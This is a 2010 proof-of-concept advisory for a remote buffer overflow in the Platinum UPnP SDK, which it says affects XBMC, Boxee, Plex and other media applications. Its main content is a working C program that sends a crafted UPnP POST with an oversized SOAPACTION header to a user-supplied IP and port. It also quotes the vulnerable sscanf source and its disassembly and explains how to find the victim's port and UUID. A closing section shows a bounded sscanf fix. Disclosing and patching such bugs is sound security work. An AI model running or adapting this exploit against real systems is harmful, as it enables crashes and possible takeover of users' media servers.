/*
 -POC CODE Remote Buffer Overflow-
 =========================================================================
 ! Exploit Title: Platinum SDK library post upnp sscanf buffer overflow !
 =========================================================================
 Date: 28th October 2010
 -----------------------
 Author: n00b
 Realname: *carl cope*
 -----------------------------------
 Software Link: http://www.plutinosoft.com/platinum
 --------------------------------------------------
 Version: All versions are affected, multiple vendors
 ---------------------------------------------------
 Tested on: Windows XP SP3, Vista SP2, Linux Ubuntu
 ---------------------------------------------------
 Fixed versions: Platinum 0.6.0
 ==========================================================================
 -Multiple vendors soap_action_name post upnp sscanf remote buffer overflow-
 ==========================================================================

 -Description-
 While testing the UPnP support in the XBMC application I found the vulnerable function in the source code and noticed that it came from the Platinum UPnP SDK, which XBMC uses for the UPnP protocol. More applications are vulnerable than I first thought. I am not writing an exploit for each of them, as that would be pointless; I have passed the information to the developers of the Platinum SDK, and once they have updated, hopefully the rest of the vendors will follow. Anything that uses this SDK is exploitable. If you do decide to write an exploit for any of the vulnerable applications, please credit n00b for finding the bug!!

 The vendor has released a fix for this vulnerability:
 http://kent.dl.sourceforge.net/project/platinum/platinum/0.6.1/CHANGELOG.txt
 I would like to thank the vendor of the SDK for taking swift action and fixing this vulnerability quickly; 10/10 for communication and for working to get this issue resolved.
 -Description-

 Version 2010-07-27 Platinum-SRC-0-6-0_632 SDK

 This is a list of the applications that are using the Platinum SDK library.

 -Affected applications-
 Asset UPnP = http://forum.dbpoweramp.com/showthread.php?t=18020 <-- Tested and is exploitable, Release v.3.
 XBMC = http://xbmc.org/ <-- Tested and is exploitable / exploit released.
 Google Simplify Media = http://www.simplifymedia.com/blog/
 qvivo = http://www.qvivo.com/us/download/
 doubletwist = http://www.doubletwist.com/
 Boxee = http://www.boxee.tv/
 BoxAmp = http://www.open7x0.org/wiki/BoxAmp
 Ventis Media = http://www.mediamonkey.com/
 DVBSBridge = http://www.dvblogic.com/
 IntelligentShare = http://www.adoubleu.de/
 Easyon.tv = http://www.easyon.tv/index.php
 Foobar plugin foo_upnp = http://www.hydrogenaudio.org/forums/index.php?showtopic=69664
 plex = http://elan.plexapp.com/
 CommVault = http://www.commvault.com/
 Iwedia = http://www.iwedia.com/
 Mythtv = http://www.mythtv.org/wiki/UPnP
 Vdr-plugin-upnp = http://www.linuxtv.org/vdrwiki/index.php/Vdr-plugin-upnp
 Anything that uses this SDK is exploitable until the update is available.
 -Affected applications-

 -Shouts-
 Aluigi = Take care m8 and all the best for the future !!.
 Corelan = Keep up the good work, thanks for the advice !!.
 Exploit-db = Looking good guys, keep up the good work !!.
 XBMC-DEV = Nice work with the project, looking nice !!.
 -Shouts-

 ----------
 Disclaimer
 ----------
 The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Educational use only..!!
*/

#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>

/*
 !!IMPORTANT!!
 The UUID must be set. I have hardcoded it to make it easy to replace with the victim UUID. You can get the UUID from the server by issuing a GET request to the vulnerable server on port 00000; a web browser is enough for this.
 example = http://127.0.0.1:00000

 -Note-
 Just a side note: the port is random. Once the XBMC application is installed, the UUID is set up along with the port number at installation, so you will have to do a port scan to find which port the service is running on; once found, it will stay on that port until the application is reinstalled. The UUID will also stay the same.

 Universally Unique Identifier
 ---------------------------------------------------
 XML example
 <UDN> uuid:0970aa46-ee68-3174-d548-44b656447658 </UDN>
 ---------------------------------------------------
 -Note-
 I was not going to write an XML parser just for this when a web browser and a set of eyes can do it. :)

 Platinum UPnP SDK: https://www.plutinosoft.com/
 http://sourceforge.net/users/c0diq
*/

//compiled using gcc on linux.
//Cygwin on windows.
void error(char *mess)
{
    perror(mess);
    exit(1);
}

int main(int argc, char *argv[])
{
    int sock;
    struct sockaddr_in http_client;
    char buf[2000];
    size_t http_len;

    /* Exactly two arguments are required: server IP and port. */
    if (argc != 3) {
        fprintf(stderr, "USAGE: %s server_ip port\n", argv[0]);
        exit(1);
    }

    /* Create socket */
    if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        error("Can't create socket");
    }

    /* Construct sockaddr */
    memset(&http_client, 0, sizeof(http_client));
    http_client.sin_family = AF_INET;
    http_client.sin_addr.s_addr = inet_addr(argv[1]);
    http_client.sin_port = htons(atoi(argv[2]));

    /* Establish connection */
    if (connect(sock, (struct sockaddr *) &http_client, sizeof(http_client)) < 0) {
        error("Failed to connect with remote host");
    }

    /* Build the UPnP request. The buffer is zeroed first so that every
       strcat below appends to a properly terminated string. */
    memset(buf, 0, sizeof(buf));
    strcpy(buf, "POST /AVTransport/");
    strcat(buf, "0970aa46-ee68-3174-d548-44b656447658"); /* Replace with the UUID of the vulnerable server */
    strcat(buf, "/control.xml HTTP/1.1\r\n");
    strcat(buf, "SOAPACTION: \x22urn:schemas-upnp-org:service:AVTransport:1#");
    strcat(buf, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
                "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
                "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
                "AAAAAA\r\n"
                "CONTENT-TYPE:text/xml; charset=\x22utf-8\x22\r\n"
                "HOST: 192.168.1.2:26125\r\n"
                "Content-Length: 345");

    /* Send our request to the server */
    http_len = strlen(buf);
    if (send(sock, buf, http_len, 0) != (ssize_t) http_len) {
        error("Failed to send request");
    }
    close(sock);
    return 0;
}

/*
 -Vulnerable source code-
 This information was found using Windows 7 + Visual C++ 2010 Express.
 .\lib\libUPnP\Platinum\Source\Core\PltDeviceHost.cpp
 ----------------------------------------------------------------------
 | PLT_DeviceHost::ProcessPostRequest
 +---------------------------------------------------------------------
 NPT_Result
 PLT_DeviceHost::ProcessHttpPostRequest(NPT_HttpRequest&              request,
                                        const NPT_HttpRequestContext& context,
                                        NPT_HttpResponse&             response)
 {
     NPT_Result                res;
     NPT_String                service_type;
     NPT_String                str;
     NPT_XmlElementNode*       xml = NULL;
     NPT_String                soap_action_header;
     PLT_Service*              service;
     NPT_XmlElementNode*       soap_body;
     NPT_XmlElementNode*       soap_action;
     const NPT_String*         attr;
     PLT_ActionDesc*           action_desc;
     PLT_ActionReference       action;
     NPT_MemoryStreamReference resp(new NPT_MemoryStream);
     NPT_String                ip_address = context.GetRemoteAddress().GetIpAddress().ToString();
     NPT_String                method     = request.GetMethod();
     NPT_String                url        = request.GetUrl().ToRequestString(true);
     NPT_String                protocol   = request.GetProtocol();

     if (NPT_FAILED(FindServiceByControlURL(url, service, true)))
         goto bad_request;

     if (!request.GetHeaders().GetHeaderValue("SOAPAction"))
         goto bad_request;

     // extract the soap action name from the header
     soap_action_header = *request.GetHeaders().GetHeaderValue("SOAPAction");
     soap_action_header.TrimLeft('"');
     soap_action_header.TrimRight('"');
     char prefix[200];
     char soap_action_name[100];      <--- 100 bytes allocated for the soap action name.
     int  ret;
     //FIXME: no sscanf
     ret = sscanf(soap_action_header, "%[^#]#%s",   <---
                  prefix,                           <--- Bad very Bad.
                  soap_action_name);                <---
     if (ret != 2)
         goto bad_request;

     // read the xml body and parse it
     if (NPT_FAILED(PLT_HttpHelper::ParseBody(request, xml)))   <--- BOOOM I WIN!!
         goto bad_request;

 Disassembly of vulnerable function.!!
 ==================================
 025D2D23  lea   edx,[ebp-1F4h]
 025D2D29  push  edx
 025D2D2A  lea   eax,[ebp-188h]
 025D2D30  push  eax
 025D2D31  push  2F5E404h
 025D2D36  lea   ecx,[ebp-44h]
 025D2D39  call  NPT_String::operator char const * (1B1840Eh)
 025D2D3E  push  eax
 025D2D3F  call  @ILT+120575(_sscanf) (1AF7704h)
 025D2D44  add   esp,10h
 025D2D47  mov   dword ptr [ebp-1FCh],eax
*/
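The quoted `sscanf(soap_action_header, "%[^#]#%s", prefix, soap_action_name)` is the whole bug: neither conversion carries a field width, so a SOAPAction header longer than the 200- and 100-byte stack arrays is written past them. The block below, an added example written for this page and not code from Platinum or from the advisory's author, places that unbounded pattern beside a bounded one that the fixed SDK would need. The array sizes match the quoted source; the function names, the return codes and the sample headers are assumptions constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Buffer sizes exactly as in the Platinum code quoted above. */
#define PREFIX_SZ 200
#define ACTION_SZ 100

/* The page's pattern: "%[^#]#%s" with no field widths. sscanf keeps writing
 * for as long as the input lasts, so a SOAPAction header longer than the
 * destination arrays overruns them. Kept here only for side-by-side
 * comparison; it must never see untrusted input. */
int parse_soap_action_unbounded(const char *hdr, char *prefix, char *name)
{
    return sscanf(hdr, "%[^#]#%s", prefix, name);
}

/* Hardened form (assumed names). Each conversion carries a width one less
 * than its buffer so the terminator always fits, and "%n" records how much
 * input was consumed: if anything is left over, the header was longer than
 * the buffers allow and is rejected rather than silently truncated.
 * Returns 0 on success, -1 if the "prefix#action" shape is not matched,
 * -2 if the header did not fit the buffers. */
int parse_soap_action_bounded(const char *hdr, char prefix[PREFIX_SZ],
                              char name[ACTION_SZ])
{
    int consumed = 0;
    int ret = sscanf(hdr, "%199[^#]#%99s%n", prefix, name, &consumed);
    if (ret != 2)
        return -1;
    if (hdr[consumed] != '\0')
        return -2;
    return 0;
}

/* Constructed input: a well-formed service URN followed by an action name of
 * 150 characters, longer than soap_action_name[100]. Returns the bounded
 * parser's verdict for it (-2). */
int demo_overlong_action(void)
{
    char hdr[256];
    char prefix[PREFIX_SZ], name[ACTION_SZ];
    const char *urn = "urn:schemas-upnp-org:service:AVTransport:1#";
    size_t n = strlen(urn);
    memcpy(hdr, urn, n);
    memset(hdr + n, 'A', 150);
    hdr[n + 150] = '\0';
    return parse_soap_action_bounded(hdr, prefix, name);
}

int main(void)
{
    char prefix[PREFIX_SZ], name[ACTION_SZ];
    const char *good = "urn:schemas-upnp-org:service:AVTransport:1#Play";
    if (parse_soap_action_bounded(good, prefix, name) == 0)
        printf("ok: service=%s action=%s\n", prefix, name);
    printf("overlong action rejected with %d\n", demo_overlong_action());
    return 0;
}
```

The width alone stops the overflow; the trailing `%n` check is what turns an over-long header into a `bad_request` instead of a silently clipped action name, which matters because the Platinum code goes on to look the name up as an action. Checking `consumed` against the end of the string is also the place to log the oversized header, which is the one observable a detection rule for this bug can key on.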